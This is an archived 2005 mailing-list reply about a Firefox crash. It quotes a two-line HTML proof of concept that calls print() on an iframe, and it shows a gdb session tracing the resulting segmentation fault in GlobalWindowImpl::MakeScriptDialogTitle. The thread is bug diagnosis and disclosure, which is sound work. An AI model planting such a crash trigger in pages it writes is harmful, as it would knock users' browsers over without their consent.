<<< Date Index >>>     <<< Thread Index >>>

Re: Firefox Crash??



Hi,

This works in my Debian Box with 1.0.2:

$ export LD_LIBRARY_PATH=/usr/lib/mozilla-firefox/
$ cat test.html
<html>
<body><iframe id="pocframe" name="pocframe" src=""></iframe>
<script type="text/javascript">
window.frames.pocframe.print();
</script>
</body>
</html>
$ export LD_LIBRARY_PATH=/usr/lib/mozilla-firefox/
$ gdb /usr/lib/mozilla-firefox/firefox-bin
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
(...)
(gdb) run ~/tmp/test/test.html
Starting program: /usr/lib/mozilla-firefox/firefox-bin
~/tmp/test/test.html
(no debugging symbols found)
(...)
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1220601760 (LWP 17803)]
0x0875d65e in GlobalWindowImpl::MakeScriptDialogTitle ()
(gdb) where
#0  0x0875d65e in GlobalWindowImpl::MakeScriptDialogTitle ()
#1  0xb7f46635 in XPTC_InvokeByIndex ()
from /usr/lib/mozilla-firefox/libxpcom.so
#2  0x083718ae in XPCWrappedNative::CallMethod ()
#3  0x08377f21 in XPC_WN_CallMethod ()
#4  0xb7fa1506 in js_Invoke () from /usr/lib/mozilla-firefox/libmozjs.so
#5  0xb7fab51d in js_Interpret ()
from /usr/lib/mozilla-firefox/libmozjs.so
#6  0xb7fa1bcc in js_Execute ()
from /usr/lib/mozilla-firefox/libmozjs.so
#7  0xb7f7cd14 in JS_EvaluateUCScriptForPrincipals ()
from /usr/lib/mozilla-firefox/libmozjs.so
#8  0x088bd382 in nsJSContext::EvaluateString ()
#9  0x0869341a in nsScriptLoader::EvaluateScript ()
#10 0x08693092 in nsScriptLoader::ProcessRequest ()
#11 0x08692c79 in nsScriptLoader::IsScriptEventHandler ()
#12 0x088896d3 in nsHTMLScriptElement::MaybeProcessScript ()
#13 0x08657d2f in nsGenericElement::AppendChildTo ()
#14 0x086c9765 in HTMLContentSink::ProcessSCRIPTTag ()
#15 0x086c7130 in HTMLContentSink::Init ()
#16 0x0849961e in CNavDTD::AddLeaf ()
#17 0x084977ae in CNavDTD::HandleScriptToken ()
#18 0x08498f59 in CNavDTD::OpenContainer ()
#19 0x08495cbf in CNavDTD::HandleDefaultStartToken ()
#20 0x08496936 in CNavDTD::HandleStartToken ()
#21 0x08494fcb in CNavDTD::BuildNeglectedTarget ()
#22 0x08494674 in CNavDTD::~CNavDTD ()
#23 0x084aae6d in nsParser::ResumeParse ()
#24 0x084aabc0 in nsParser::ResumeParse ()
#25 0x084abe85 in nsParser::DetectMetaTag ()
#26 0x08908acd in nsDocumentOpenInfo::Open ()
#27 0x0840966a in nsFileChannel::EnsureStream ()
#28 0x083c6acb in nsInputStreamPump::OnStateTransfer ()
#29 0x083c692f in nsInputStreamPump::EnsureWaiting ()
#30 0xb7f14c21 in nsInputStreamReadyEvent::EventHandler ()
from /usr/lib/mozilla-firefox/libxpcom.so
#31 0xb7f2b297 in PL_HandleEvent ()
from /usr/lib/mozilla-firefox/libxpcom.so
#32 0xb7f2b1c4 in PL_ProcessPendingEvents ()
from /usr/lib/mozilla-firefox/libxpcom.so
#33 0xb7f2ce59 in nsEventQueueImpl::NotifyObservers ()
from /usr/lib/mozilla-firefox/libxpcom.so
#34 0x08568735 in nsBaseWidget::FreeNativeData ()
#35 0xb7a04dbf in g_vasprintf () from /usr/lib/libglib-2.0.so.0
#36 0xb79df582 in g_main_depth () from /usr/lib/libglib-2.0.so.0
#37 0xb79e05f8 in g_main_context_dispatch ()
from /usr/lib/libglib-2.0.so.0
#38 0xb79e0930 in g_main_context_dispatch ()
from /usr/lib/libglib-2.0.so.0
#39 0xb79e0ed3 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#40 0xb7c828f3 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#41 0x08568a78 in nsAppShell::ReleaseGlobals ()
#42 0x08a0e8d4 in nsAppShellService::AttemptingQuit ()
#43 0x08c13800 in xre_main ()
#44 0x0834af24 in main ()

This is a simple bug in Firefox.

Bye,
Joxean Koret


On Tue, 2005-05-10 at 20:38 +0000, orebla Orebla wrote:
> 
> I have found this script in turn for the net and it sends to me in crash 
> Firefox:
> 
> <!--PROOF OF CONCEPT
> The vulnerability can be exploited with the following 2 lines of code:
> 
> <iframe id="pocframe" name="pocframe" src="about:blank"></iframe>
> &lt;script 
> type="text/javascript">window.frames.pocframe.print();&lt;/script&gt;
> -->
> 
> I have WinXP SP2 e Firefox 1.0.3.
> 
> Why firefox crash???
> 
> PS: I do not have uncovered the vulnerability. Sorry for the English... 
> :-)
-- 
------ 
 El primer pecado de la humanidad fue la fe; la primera virtud, la duda.

Attachment: signature.asc
Description: This is a digitally signed message part